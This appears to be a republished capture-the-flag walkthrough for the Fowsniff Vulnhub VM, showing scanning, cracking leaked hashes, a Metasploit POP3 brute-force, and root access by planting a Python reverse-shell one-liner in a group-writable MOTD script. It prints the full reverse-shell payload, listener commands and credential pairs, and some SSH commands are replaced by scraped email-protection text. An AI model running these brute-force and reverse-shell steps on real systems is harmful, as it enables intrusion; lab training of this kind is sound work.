E Exploits

Fowsniff: 1 Vulnhub Walkthrough

Hello friends! Today we are going to take another boot2root challenge known as Fowsniff. The credit for making this vm machine goes to “berzerk0” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Beginner

Flags: There is one flag (flag.txt).

Table of contents:

  • Port scanning and IP discovery.
  • Hitting on port 80
  • Finding hashes on Pastebin
  • Decoding hashes
  • Brute force pop3 login
  • Connecting to pop3
  • Finding SSH username and password
  • Finding privilege escalation vectors
  • Exploiting Misconfiguration in system
  • Getting root access.
  • Reading the flags.

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

image

We found our target –> 192.168.1.29

Our next step is to scan our target with nmap.

nmap -A -p- -T4 192.168.1.29

image

The NMAP output shows us that there are 4 ports open: 22(SSH), 80(HTTP), 110(POP3), 143(IMAP)

We find that port 80 is running http, so we open the IP in our browser.

image

We don’t find anything on webpage. Dirb scan and nikto also didn’t reveal anything, so we googled “fowsniff corp” and found a pastebin link that contained username and passwords. (You can find the link here)

image

We cracked the hashes use this site and find passwords to the respective email addresses. But only 8 hashes were cracked and there are 9 usernames.

image

So we create two wordlists one for username and one for passwords, we will use this to brute force pop3 login.

image

We use Metasploit-framework to brute force pop3 login. After running the brute forcing pop3 login we find the correct credentials to be “seina:scoobydoo2”.

msf > use auxiliary/scanner/pop3/pop3_login
msf auxiliary(scanner/pop3/pop3_login) > set rhosts 192.168.1.29
msf auxiliary(scanner/pop3/pop3_login) > set user_file user.txt
msf auxiliary(scanner/pop3/pop3_login) > set pass_file pass.txt
msf auxiliary(scanner/pop3/pop3_login) > set verbose false
msf auxiliary(scanner/pop3/pop3_login) > run

 image

We connect to pop3 service on the target server and login using the credentials we retrieved. After logging in we list the messages and find there are 2 messages.

nc 192.168.1.29 110
user seina
pass scoobydoo2
list

image

We retrieved the 1st message and find that it contains the password to connect through SSH.

retr 1

image

We retrieved the second message and find a message that hints that use the username “baksteen”.

retr 2

image

We use the credentials “baksteen:S1ck3nBluff+secureshell” to login through SSH.

ssh Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.

image

After gaining access we enumerate the system, as user “baksteen” belongs to two different groups. We use try to find files that belong to “users” group and find a file called “cube.sh”.

find / -group users -type f 2>/dev/null

image

We take a look at the content of the file and find it contains the message that comes once we login through SSH.

cd /opt/cube
cat cube.sh

image

We open the file with vim, and add python reverse shell one liner in the file.

p

ython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.29",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image

We try to run it and find it gives an error “python: command is not found”. We try to locate python and find it contains python3.

image

So we make changes to the exploit we change the python reverse shell one liner. We replace python with python3.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.29",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image

As when we login through SSH we get a banner similar to the one that “cube.sh” contains. So we check “/etc/update-motd.d/” directory to look for executables that might run this program and find that file “00-header” runs this shell script.

image

So now we exit the SSH and setup our listener using netcat, then we again connect through SSH. So that our reverse shell gets executed.

ssh Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.

image

As soon as we successfully login, we get a reverse shell as root user on our netcat listener. We go to the root directory and find the file called “flag.txt”. We take a look at the content of the file and find the congratulatory message.

nc -lvp 1234
id
cd /root
cat flag.txt

image

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Fowsniff: 1 Vulnhub Walkthrough appeared first on Hacking Articles.

Read more